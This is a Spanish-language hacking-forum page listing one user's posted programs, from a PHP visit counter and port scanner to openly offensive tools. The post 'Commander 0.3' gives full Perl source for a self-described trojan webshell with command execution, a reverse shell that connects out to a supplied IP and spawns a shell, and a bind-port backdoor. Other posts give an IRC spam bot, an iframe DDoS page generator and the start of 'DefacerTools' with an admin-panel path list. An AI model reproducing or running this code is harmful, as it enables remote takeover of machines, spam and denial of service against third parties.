Temas - BigBear - Página 8

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - BigBear

Páginas 1 2 3 4 5 6 7 8 9 10

#316

PHP / Simple contador de visitas

31 Enero 2012, 21:56 PM

Un simple contador de visitas.

La clase del contador

Código (php) [Seleccionar]


<?php

/*

Base de un contador de visitas 

V 0.1

Coded By Doddy H

*/


class contador {

public function start($host,$user,$pass,$db) {

if ($test = @mysql_connect($host,$user,$pass)) {
if (mysql_select_db($db)) {
return true;
}}}

public function end() {
$test->close;
}

public function instalar() {

$todo1 = "create table visitas (
suma int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
PRIMARY KEY (suma));
";

if (mysql_query($todo1)) {
return true;
}
}

public function desinstalar() {

if (@mysql_query("drop table visitas")) {
return true;
}}

public function otromas() {
if (@mysql_query("INSERT INTO visitas(suma)VALUES('NULL')")) {
return true;
}}

public function totalvisitas() {
return mysql_num_rows(mysql_query("select suma from visitas"));
}

}

// The End ? 

?>

Ejemplos de uso

Código (php) [Seleccionar]


<?php 

include_once("contador.php");

$name = New contador;

$name->start("localhost","root","","contador");
//$name->instalar();
//$name->desinstalar();

$name->otromas();//funcion vital para contar la visita

$cantidad = $name->totalvisitas(); //funcion para contar el total de visitas

echo "<center><h1>Total de visitas $cantidad</h1></center>";

$name->end();

// The End ?


?>

#317

Scripting / [Perl] Terr0r B0t 0.3

19 Enero 2012, 20:36 PM

Un bot para IRC con funciones orientadas al hacking asi como codificaciones , buscador de SQLI u otras.

http://pastebin.com/g3dxSf2C

#318

Scripting / [Perl] Project STALKER 0.7

19 Enero 2012, 20:36 PM

Un reemplazo de console CMD con las siguientes opciones

[++] Reconocer IP de un Host
[++] Capturar Links de una pagina
[++] Capturar todos los procesos activos
[++] Matar algun proceso
[++] Conectarse a donde sea con sockets
[++] Capturar metodos de un servidor HTTP
[++] Buscar paths activos para listado de directorios
[++] Encode/Decode para Hex,ASCII,Base64
[++] Scannear puertos
[++] Buscar panel de administracion
[++] Crackear un hash mediante paginas
[++] Scanner SQLI
[++] Cliente FTP y MYSQL
[++] Reconocer informacion de una ip
[++] Whois xD
[++] Navegador de archivos
[++] Scannear en google mediante dorks

http://pastebin.com/inQWXx9A

#319

Scripting / [Perl] Manager 0.3

19 Enero 2012, 20:35 PM

Un simple script para manejar los procesos en Windows.

Código (perl) [Seleccionar]


#!usr/bin/perl
#Manager 0.3
#Written By Doddy H

use Color::Output;
Color::Output::Init;
use Win32::OLE qw(in);
use Win32::Process;

&clean;
&options;

sub clean {
    cprint "\x0313";
    print
"\nManager 0.3\nCopyright 2012 Doddy Hackman\nMail:lepuke[at]hotmail[com]\n\n";
    cprint "\x0x30\n\n";
    my %process = getprocess();
    chomp %process;
    $limit = "";
    for my $pid ( keys %process ) {
        if ( $pid ne "" ) { $limit++ }
        push( @procer, $process{$pid} );
        push( @pids,   $pid );
        chomp( @procer, @pids );
    }
    $limit--;
    for my $n ( 1 .. $limit ) {
        cprint "\x037";
        print
          "Process Number: [$n]\tProcess name : $procer[$n]\tPID : $pids[$n]\n";
        cprint "\x037";
    }
}

sub options {
    cprint "\0035";
    print
"\n\nOptions :\n\n[a] : Close a process\n[b] Clean Console\n[c] Exit\n\n\n[+] Write you options : ";
    $t = <STDIN>;
    chomp $t;
    if ( $t eq "a" ) {
        &close;
    }
    elsif ( $t eq "b" ) {
        reload();
    }
    elsif ( $t eq "c" ) {
        print "\n\n[+] Written By Doddy H\n\n";
        <stdin>;
        exit(1);
    }
    else {
        reload();
    }
}

sub close {
    print "\n[+] Write the number of the process : ";
    $numb = <STDIN>;
    chomp $numb;
    Win32::Process::KillProcess( @procer[$numb], "" );
    print "\n\n[+] OK , Process Closed\n\n";
    <stdin>;
    reload();
}

sub reload {
    system("cls");
    system($0);
    &clean;
    &options;
}

sub getprocess {

    my %procesos;

    my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
    my $dos = $uno->ConnectServer( "", "root\\cimv2" );

    foreach my $pro ( in $dos->InstancesOf("Win32_Process") ) {
        $procesos{ $pro->{Caption} } = $pro->{ProcessId};
    }
    return %procesos;
}

# The End ?

#320

Scripting / [Perl] LocateIP 0.3

19 Enero 2012, 20:35 PM

La nueva version de este programa para buscar informacion sobre un ip.

Código (perl) [Seleccionar]


#!usr/bin/perl
#LocateIP 0.3 (C) Doddy Hackman 2012

use LWP::UserAgent;
use IO::Socket;

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);

head();
if ( $ARGV[0] ) {
    start( $ARGV[0] );
}
else {
    sintax();
}
copyright();

sub start {
    print "\n[+] Target :  $_[0]\n";
    infocon( $_[0] );
}

sub sintax {
    print "\n[+] sintax : $0 <web>\n";
}

sub head {
    print q(



 @      @@@@    @@@@    @    @@@@@  @@@@@     @  @@@@@ 
 @     @    @  @    @   @      @    @         @  @    @
 @     @    @  @       @ @     @    @         @  @    @
 @     @    @  @       @ @     @    @         @  @    @
 @     @    @  @      @   @    @    @@@@      @  @@@@@ 
 @     @    @  @      @   @    @    @         @  @     
 @     @    @  @      @@@@@    @    @         @  @     
 @     @    @  @    @@     @   @    @         @  @     
 @@@@@  @@@@    @@@@ @     @   @    @@@@@     @  @     



);
}

sub copyright {
    print "\n\n== --(C) Doddy Hackman 2012 -- ==\n\n";
    exit(1);
}

sub infocon {
    my $target = shift;

    my $get    = gethostbyname($target);
    my $target = inet_ntoa($get);

    print "\n\n[+] Getting info\n\n\n";
    $total =
      "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
    $re = toma($total);

    if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
        print "[+] City : $2\n";
    }
    else {
        print "[-] Not Found\n";
        copyright();
    }
    if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
        print "[+] Country : $2\n";
    }
    if ( $re =~ /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
        print "[+] State or Region : $2\n";
    }

    print "\n\n[+] Getting Hosts\n\n\n";

    my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );

    while ( $code =~ /whois\/(.*?)\">Whois/g ) {
        my $dns = $1;
        chomp $dns;
        print "[DNS] : $dns\n";
    }
}

sub toma {
    return $nave->get( $_[0] )->content;
}

# ¿ The End ?

#321

Scripting / [Perl] IRC Spam 0.3

19 Enero 2012, 20:34 PM

Un simple script para hacer spam molesto a cada uno de los usuarios que esten en en canal , el spam lo
pueden editar con una pagina cualquiera o lo que quieran promocionar.

Código (perl) [Seleccionar]


#!usr/bin/perl
#IRC Spam 0.3
#Coded By Doddy H

use IO::Socket;

my @msg_users = ( "Hola",         "Chau" );          #Spam to users
my @msg_canal = ( "Hola a todos", "que ondaaa" );    #Spam to canal
my @bots      = ( "Jebus",        "Ramona" );        #Names of the bots

&head;

unless ( @ARGV == 2 ) {

    &sintax;

}
else {

    print "\n[+] Connecting\n\n";

    if (
        my $socket = new IO::Socket::INET(
            PeerAddr => $ARGV[0],
            PeerPort => 6667,
            Proto    => "tcp"
        )
      )
    {

        my $nombre = $bots[ rand(@bots) ];

        chomp $nombre;

        print $socket "NICK $nombre\r\n";
        print $socket "USER $nombre 1 1 1 1\r\n";
        print $socket "JOIN $ARGV[1]\r\n";

        print "[+] Spammer Online\n\n";

        while ( my $log = <$socket> ) {

            chomp $log;

            if ( $log =~ /^PING(.*)$/i ) {
                print $socket "PONG $1\r\n";
            }

            if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {

                while (true) {

                    my $pro = $4;

                    sleep 10;

                    print $socket "PRIVMSG $ARGV[1] "
                      . $msg_canal[ rand(@msg_canal) ] . "\r\n";
                    my @nicks = split " ", $pro;

                    sleep 3;

                    foreach $names (@nicks) {
                        unless ( $nombre eq $names ) {
                            $names =~ s/\@//;
                            print $socket
                              "MSG $names $msg_users[rand(@msg_users)]\r\n";
                            print "[+] Spam : $names !\n";
                        }
                    }
                }
            }
        }
    }
    else {
        print "[-] Error\n";
    }
}

&copyright;

sub sintax {
    print "\n[+] : $0 <server> <channel>\n";
}

sub head {

    print qq(

 @  @@@@@    @@@@      @@@   @@@@@    @    @     @  @     @  @@@@@  @@@@@ 
 @  @    @  @    @    @   @  @    @   @    @     @  @     @  @      @    @
 @  @    @  @         @      @    @  @ @   @@   @@  @@   @@  @      @    @
 @  @    @  @         @      @    @  @ @   @@   @@  @@   @@  @      @    @
 @  @@@@@   @          @@@   @@@@@  @   @  @ @ @ @  @ @ @ @  @@@@   @@@@@ 
 @  @    @  @             @  @      @   @  @ @ @ @  @ @ @ @  @      @    @
 @  @    @  @             @  @      @@@@@  @  @  @  @  @  @  @      @    @
 @  @    @  @    @    @   @  @     @     @ @  @  @  @  @  @  @      @    @
 @  @    @   @@@@      @@@   @     @     @ @     @  @     @  @@@@@  @    @


);

}

sub copyright {
    print "\n\n(C) Doddy Hackman 2012\n\n";
}

# The End ?

#322

Scripting / [Perl] Commander 0.3

19 Enero 2012, 20:34 PM

Una mejora de un troyano al estilo webshell que habia hecho el verano pasado.

Código (perl) [Seleccionar]


#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2012
#Version 0.3
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use Win32;

my $port = rep();

sub rep {
    unless ( $ARGV[0] ) {
        return int("777");    #Your Can Edit 666
    }
    else {
        return int( $ARGV[0] );
    }
}

print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2012\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";

my $sock = new IO::Socket::INET(
    LocalHost => 'localhost',
    LocalPort => $port,
    Proto     => 'tcp',
    Listen    => SOMAXCONN,
    Reuse     => 1
);

while ( $jebus = $sock->accept() ) {

    print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";

#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
    next if $slave = fork;

    close $sock;

    while ( $response = <$jebus> ) {

        chomp($response);

        my %rta;

        if ( $response =~ /GET/ig ) {
            capturar($response);
        }

        sub capturar {
            my $aa = shift;
            chomp $aa;
            if ( $aa =~ /GET \/(.*) HTTP\/1.1/ig ) {
                my $todo = $1;
                if ( $todo =~ /\?(.*)=(.*)&(.*)=(.*)/ig ) {
                    $rta{$1} = $2;
                    $rta{$3} = $4;
                }
                if ( $todo =~ /\?(.*)=(.*)/ig ) {
                    $rta{$1} = $2;
                }
            }

        }

        print $jebus "

<style type=text/css>


.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: #00FF00;
}

#pie {
position: absolute;
bottom: 0;
}

body,a:link {
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select,fieldset {
background-color:black;color:#00FF00; 
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

";

        if ( $rta{'info'} ) {

            info();

            print $jebus "<center><br><br><b>IP : </b>" . get_ip() . "<br>";
            print $jebus "<center><br><br><b>Domain : </b>"
              . Win32::DomainName() . "<br>";
            print $jebus "<b>Chip : </b>" . Win32::GetChipName() . "<br>";
            print $jebus "<b>OS : </b>" . Win32::GetOSName() . "<br>";
            print $jebus "<b>Version : </b>" . Win32::GetOSVersion() . "<br>";
            print $jebus "<b>User : </b>"
              . Win32::LoginName()
              . "<br><br></center>";
            copyright();

        }

        elsif ( $rta{'console'} ) {
            logouno();
            print $jebus "
<br><br><center>
<form action='' method=GET>
Command : <input type=text name=cmd value=ver><input type=submit value=Execute>
</center></form><br><br>
";
            copyright();
        }

        elsif ( $rta{'cmd'} ) {
            logouno();
            $lucha = $rta{'cmd'};
            print $jebus "<br><br><center><fieldset>";
            $lucha =~ s/\+/ /;
            print $jebus "<br>[+] Command : <b>$lucha</b><br><br>";
            print $jebus qx($lucha);
            print $jebus "</center></fieldset>";
            copyright();
        }

        elsif ( $rta{'reverse'} ) {

            logodos();

            print $jebus qq(
<center>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>
</center>
);

            copyright();
        }

        elsif ( $rta{'ipconnect'} ) {

            conectar( $rta{'ipconnect'}, $rta{'port'} );
            tipo();

            sub conectar {
                socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp") );
                connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
                open( STDIN,  ">&REVERSE" );
                open( STDOUT, ">&REVERSE" );
                open( STDERR, ">&REVERSE" );
            }

            sub tipo {
                print "\n[*] Reverse Shell Starting...\n\n";
                if ( $^O =~ /Win32/ig ) {
                    infowin();
                    system("cmd.exe");
                }
                else {
                    infolinux();

                    #root();
                    system("export TERM=xterm;exec sh -i");
                }
            }

            sub infowin {
                print "[+] Domain Name : " . Win32::DomainName() . "\n";
                print "[+] OS Version : " . Win32::GetOSName() . "\n";
                print "[+] Username : " . Win32::LoginName() . "\n\n\n";
            }

            sub infolinux {
                print "[+] System information\n\n";
                system("uname -a");
                print "\n\n";
            }
        }

        elsif ( $rta{'backdoor'} ) {

            logotres();

            print $jebus qq(
<center>
<br><br><b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>
</center>
);

            copyright();

        }

        elsif ( $rta{'portbind'} ) {

            $backdoor = IO::Socket::INET->new(
                Proto     => 'tcp',
                LocalPort => $rta{'portbind'},
                Listen    => SOMAXC,
                Reuse     => 1
            );

            while ( $jesus = $backdoor->accept() ) {
                $jesus->autoflush(1);
                print $jesus
                  "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : " 
                  . $$ . "\n\n";
                print $jesus "Welcome  " . $jesus->peerhost . "\n\n";
                &extras;
                $dir = getcwd();
                print $jesus $dir . ">>";
                while (<$jesus>) {
                    my $yeah = qx($_);
                    print $jesus "\n\n" . $yeah . "\n\n";
                    print $jesus $dir . ">>";
                }
            }

            sub extras {

                if ( $^O =~ //ig ) {
                    print $jesus "[+] Domain Name : "
                      . Win32::DomainName() . "\n";
                    print $jesus "[+] OS Version : "
                      . Win32::GetOSName() . "\n";
                    print $jesus "[+] Username : "
                      . Win32::LoginName()
                      . "\n\n\n";
                }
                else {
                    $s = qx("uname -a");
                    print $jesus "--==System Info==--\n\n" . $s;
                }
            }
        }

        elsif ( $rta{'about'} ) {

            about();

            print $jebus qq(
<pre><center>

                                           
                 ¾¾¾¾¾¾¾¾¾¾¾               
             ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾           
           ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾         
         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾       
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾       
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾       
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
        ¾¾¾¾¾¾¾  ¾¾¾¾¾¾¾¾¾¾¾    ¾¾¾¾       
         ¾¾¾¾       ¾¾¾¾¾¾      ¾¾¾¾       
          ¾¾¾      ¾¾¾ ¾¾¾      ¾¾¾        
          ¾¾¾¾¾¾¾¾¾¾¾   ¾¾¾   ¾¾¾¾          
           ¾¾¾¾¾¾¾¾¾     ¾¾¾¾¾¾¾¾¾         
           ¾¾¾¾¾¾¾¾¾  ¾  ¾¾¾¾¾¾¾¾¾         
           ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾         
                ¾¾¾¾¾¾¾¾¾¾¾¾¾              
              ¾  ¾¾¾¾¾¾¾¾¾¾  ¾             
              ¾    ¾ ¾¾¾¾ ¾  ¾             
              ¾ ¾¾          ¾¾             
     ¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾             
    ¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾     
    ¾¾¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾¾¾¾   
    ¾¾¾¾¾¾¾¾¾¾      ¾¾¾         ¾¾¾¾¾¾¾¾¾  
     ¾¾¾  ¾¾¾¾¾¾             ¾¾¾¾¾¾¾¾¾¾¾   
              ¾¾¾¾¾¾     ¾¾¾¾¾¾¾           
                 ¾¾¾¾¾¾¾¾¾¾¾¾              
                  ¾¾¾¾¾¾¾¾¾                
               ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾             
           ¾¾¾¾¾¾¾         ¾¾¾¾¾¾¾         
       ¾¾¾¾¾¾¾                ¾¾¾¾¾¾¾¾¾¾   
  ¾¾¾¾¾¾¾¾                       ¾¾¾¾¾¾¾¾  
  ¾¾¾¾¾¾                           ¾¾¾¾¾¾  
   ¾¾¾¾                             ¾¾¾¾   
                                          

</pre></center>

);

            copyright();

        }
        else {
            print $jebus "
<title>Commander 0.3 (C) Doddy Hackman 2012</title>
<br><br>
<h1><center>Commander</center></h1>
<br><br>
<center>
<table border=1>
<td class=main><center><b>Tools</b></center></td><tr>
<td class=main><a href=?info=true><center>Information</center></a></td><tr>
<td class=main><a href=?console=true><center>Console</center></a></td><tr>
<td class=main><a href=?backdoor=true><center>Backdoor</center></a></td><tr>
<td class=main><a href=?reverse=true><center>ReverseShell</center></a></td><tr>
<td class=main><a href=?about=true><center>About</center></a></td>
</table>
</center>
";
            copyright();
        }
        $jebus->close;
    }
}
continue {
    $jebus->close;
}

sub logouno {
    print $jebus qq(

<pre><center>


    @@@@@@@@                                                  @@            
  @@        @@                                                @@            
  @@                                                          @@            
  @@              @@@@@@    @@  @@@@      @@@@      @@@@@@    @@    @@@@@@  
  @@            @@      @@  @@@@    @@  @@    @@  @@      @@  @@  @@      @@
  @@            @@      @@  @@      @@    @@      @@      @@  @@  @@@@@@@@@@
  @@            @@      @@  @@      @@      @@    @@      @@  @@  @@        
  @@        @@  @@      @@  @@      @@  @@    @@  @@      @@  @@  @@      @@
    @@@@@@@@      @@@@@@    @@      @@    @@@@      @@@@@@    @@    @@@@@@  


</pre></center>
);
}

sub logodos {
    print $jebus qq(
<pre><center>


  @@@@@@@@@@                                                                    
  @@        @@                                                                  
  @@        @@                                                                  
  @@        @@      @@@@@@    @@      @@    @@@@@@    @@@@    @@@@      @@@@@@  
  @@@@@@@@@@      @@      @@  @@      @@  @@      @@  @@    @@    @@  @@      @@
  @@        @@    @@@@@@@@@@    @@  @@    @@@@@@@@@@  @@      @@      @@@@@@@@@@
  @@        @@    @@            @@  @@    @@          @@        @@    @@        
  @@        @@    @@      @@      @@      @@      @@  @@    @@    @@  @@      @@
  @@        @@      @@@@@@        @@        @@@@@@    @@      @@@@      @@@@@@  


</pre></center>
);
}

sub logotres {

    print $jebus qq(
<pre><center>

  @@@@@@@@                              @@                  @@                              
  @@      @@                            @@                  @@                              
  @@      @@                            @@                  @@                              
  @@      @@      @@@@@@      @@@@@@    @@    @@      @@@@@@@@    @@@@@@      @@@@@@    @@@@
  @@@@@@@@              @@  @@      @@  @@  @@      @@      @@  @@      @@  @@      @@  @@  
  @@      @@      @@@@@@@@  @@          @@@@        @@      @@  @@      @@  @@      @@  @@  
  @@      @@    @@      @@  @@          @@  @@      @@      @@  @@      @@  @@      @@  @@  
  @@      @@    @@      @@  @@      @@  @@    @@    @@      @@  @@      @@  @@      @@  @@  
  @@@@@@@@        @@@@@@@@    @@@@@@    @@      @@    @@@@@@@@    @@@@@@      @@@@@@    @@  


</pre></center>
);
}

sub about {

    print $jebus qq(
<pre><center>


      @@        @@                                      
      @@        @@                                  @@  
    @@  @@      @@                                  @@  
    @@  @@      @@@@@@@@      @@@@@@    @@      @@  @@@@
  @@      @@    @@      @@  @@      @@  @@      @@  @@  
  @@      @@    @@      @@  @@      @@  @@      @@  @@  
  @@@@@@@@@@    @@      @@  @@      @@  @@      @@  @@  
@@          @@  @@      @@  @@      @@  @@    @@@@  @@  
@@          @@  @@@@@@@@      @@@@@@      @@@@  @@    @@


</pre></center>
);

}

sub info {

    print $jebus qq(
<pre><center>


  @@    @@        @@    @@@@@@@@@@    @@@@@@@@  
  @@    @@@@      @@    @@          @@        @@
  @@    @@@@      @@    @@          @@        @@
  @@    @@  @@    @@    @@          @@        @@
  @@    @@  @@    @@    @@@@@@@@    @@        @@
  @@    @@    @@  @@    @@          @@        @@
  @@    @@      @@@@    @@          @@        @@
  @@    @@      @@@@    @@          @@        @@
  @@    @@        @@    @@            @@@@@@@@  


</pre></center>
);

}

sub get_ip {
    my $get = gethostbyname("");
    return inet_ntoa($get);
}

sub copyright {
    print $jebus
      "<br><br><br><br><center><h1>Coded By Doddy H</h2></center><br><br>";
    exit(1);
}

# The End ?

#323

Programación C/C++ / [C] ScanPort

8 Enero 2012, 18:42 PM

Un simple programa para scannear puertos, solo funciona bajo linux.

Código (c) [Seleccionar]

/**
* ScanPort 0.1
* Coded by Doddy H 
**/

#include<stdio.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<stdlib.h>
#include<netdb.h>

void head() { 
  printf("\n-- == ScanPort 0.1 == --\n");
}

void end() {
  printf("\n\nWritten By Doddy H\n\n");
}

int main(int argc,char **argv) {
	
  char *ip;
  int port,control,partedos,portstart,portend;
  struct sockaddr_in parteuno;	

  head();
  if(argc != 4) {
    printf("\n[+] sintax : port <ip> <portstart> <portend>");
  } else {
    ip = argv[1];
    portstart = atoi(argv[2]);
    portend = atoi(argv[3]);
    printf("\n[+] Scanning %s\n",ip);
    printf("\n[+] Parameters : %d-%d\n",portstart,portend);
    for(port=portstart;port<portend;port++) {
      parteuno.sin_family=AF_INET;
      parteuno.sin_port=htons(port);
      parteuno.sin_addr.s_addr=inet_addr(ip);
      partedos=socket(AF_INET,SOCK_STREAM,0);
      control=connect(partedos,(struct sockaddr_in *)&parteuno,sizeof(parteuno));
      if(control>=0) {
        printf("\n[+] Port Found : %d",port);
      }   
    }
  }
  end();
  return 0;
}

/** The End ? **/

#324

Programación C/C++ / [C] ResolveIP

8 Enero 2012, 18:41 PM

Un simple programa para saber la IP de cualquier host.

Código (c) [Seleccionar]


/**
* ResolveIP 0.1 
* Written By Doddy H
* Thanks to CrashCool
*/

#include <winsock.h>
#include <stdio.h>

void head() {
  printf("\n -- == ResolveIP 0.1 == --\n\n");    
}

void end() {
  printf("\n\n -- == Written By Doddy H == --\n");
}

int main(int argc, char *argv[]) {
  char *dom,*host,*ip;
  struct hostent *parteuno;
  WSADATA partedos;

  head();
 
  if(argc != 2) {
    printf("\n[+] Sintax : resolve <host>\n");
  } else {
    dom = argv[1];
    WSAStartup(MAKEWORD(1,1),&partedos);
    parteuno = gethostbyname(dom);
    if(parteuno==NULL) {
      printf("\n[-] Error\n");
      end();
      exit(1);
    }
    host = parteuno->h_name;
    ip = inet_ntoa(*((struct in_addr *)parteuno->h_addr));
    printf("\n[+] HOST : %s",host);
    printf("\n[+] IP : %s\n",ip);
  }
  end();
  return 0;
}

/* The End */

#325

Programación C/C++ / [C] Manager

8 Enero 2012, 18:40 PM

Un simple programa para manejar los procesos de Windows.

Código (c) [Seleccionar]



/**
Simple process manager
Coded By Doddy H
**/

#include <windows.h>
#include <Tlhelp32.h>
#include <stdio.h>

int main() {
  HANDLE parteuno,partedos;
  PROCESSENTRY32 control;
  int re,pid;

  printf("\n\n-- == Manager == --\n\n");
  printf("1 - Show Process\n");
  printf("2 - Close Process\n");
  printf("3 - Exit\n\n");
  
  while(1) {
    printf("[Option] : ");
    scanf("%d",&re);
    
    if (re==1) {
      printf("\n[+] Getting process..\n\n");         
      parteuno = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
      Process32First(parteuno,&control);
      while(Process32Next(parteuno,&control)){
        printf("[+] Process : %s \n",control.szExeFile);
        printf("[+] PID : %i\n\n",control.th32ProcessID);
      }
      CloseHandle(parteuno);
    }
    else if (re==2) {
      printf("\n[PID] : ");
      scanf("%d",&pid);
      partedos =OpenProcess(PROCESS_TERMINATE,0,pid);
      if (TerminateProcess(partedos,0)) {
        printf("\n[+] Process Closed\n\n");
      } else {
        printf("\n[-] Error\n\n");
        exit(1);
      }
      CloseHandle(partedos);
    }
    else if (re==3) {
      setbuf (stdin,NULL);   
      printf("\n\nWritten By Doddy H\n\n");
      getchar();
      exit(1);
    }
  }
  return 0;
}

/** The End ? **/

#326

Programación C/C++ / [C] Iframe DDOS

8 Enero 2012, 18:38 PM

Un simple POC para iframe DDOS

Código (c) [Seleccionar]



/**
* Simple POC for IFRAME DDOS
* Coded By Doddy H
*/

#include <stdio.h>

void head() {
  printf("\n -- == IFRAME DDOS 0.1 == --\n\n");    
}

void end() {
  printf("\n\n -- == Coded By Doddy H == --\n");
}
 
int main ( int argc, char **argv ) {
  char *target;
  int i,count;
  FILE *archivo;

  head();
  if(argc != 3) {
    printf("\n[+] Sintax : ddos <target> <count>\n");
  } else {
    target = argv[1];
    count = atoi(argv[2]);
    printf("\n[+] Starting the party");
    archivo = fopen ("poc.html","a+"); 
    for(i=0;i<=count;i++) {                          
      fprintf(archivo,"%s","<iframe src='");
      fprintf(archivo,"%s",target);
      fprintf(archivo,"%s","' width='3' height='3'></iframe><br>\n");
    }
    fclose(archivo);    
    printf("\n[+] Finished\n");
  }     
  end();
  return 0;
}

/** The End ? */

#327

Programación C/C++ / [C] Hex Converter

8 Enero 2012, 18:37 PM

Un simple programa para convertir texto en hex

Código (c) [Seleccionar]

/**
* Hex Converter
* Coded By Doddy H
* Based in hex encoder by Ka0x
*/

#include <stdio.h>
#include <string.h>

void head() {
  printf("\n -- == Hex Converter == --\n\n");    
}

void end() {
  printf("\n\n\n -- == Coded By Doddy H == --\n");
}
 
int main ( int argc, char **argv ) {
  char *text;
  int i,total;
  
  head();
  if(argc != 2) {
    printf("\n[+] Sintax : hex <text>");
  } else {
    text = argv[1];
    total = strlen(text);
    printf("\n[Text] : %s\n",text);
    printf("[Encode] : 0x");
    for(i=0;i<total;i++){
      printf("%x",text[i]);
    }
  }     
  end();
  return 0;
}

/** The End ? */

#328

Scripting / [Perl] DefacerTools 0.5 (regalo de navidad)

11 Diciembre 2011, 01:03 AM

Hola aca les traigo un regalo de navidad que hice en 3 horas , es un programa en CGI para usar en webs que
soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien.

Las funciones del programa son :

HexConverter
PanelFinder
PathsFinder
SQLi Scanner
FuzzDNS
FinderPass
PortScanner

El codigo del programa (formateado con perltidy) es

defacertools.cgi

Código (perl) [Seleccionar] Expandir
#!"\xampp\perl\bin\perl.exe" # #DefacerTools 0.5 # #(C) Doddy Hackman 2012 # # use CGI; use LWP::UserAgent; use URI::Split qw(uri_split); use HTML::LinkExtor; use IO::Socket; @panels = ( 'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx', 'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx', 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php', 'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php', 'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php', 'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php', 'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/', 'administrator/index.html', 'administrator/login.html', 'administrator/account.html', 'administrator/account.php', 'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php', 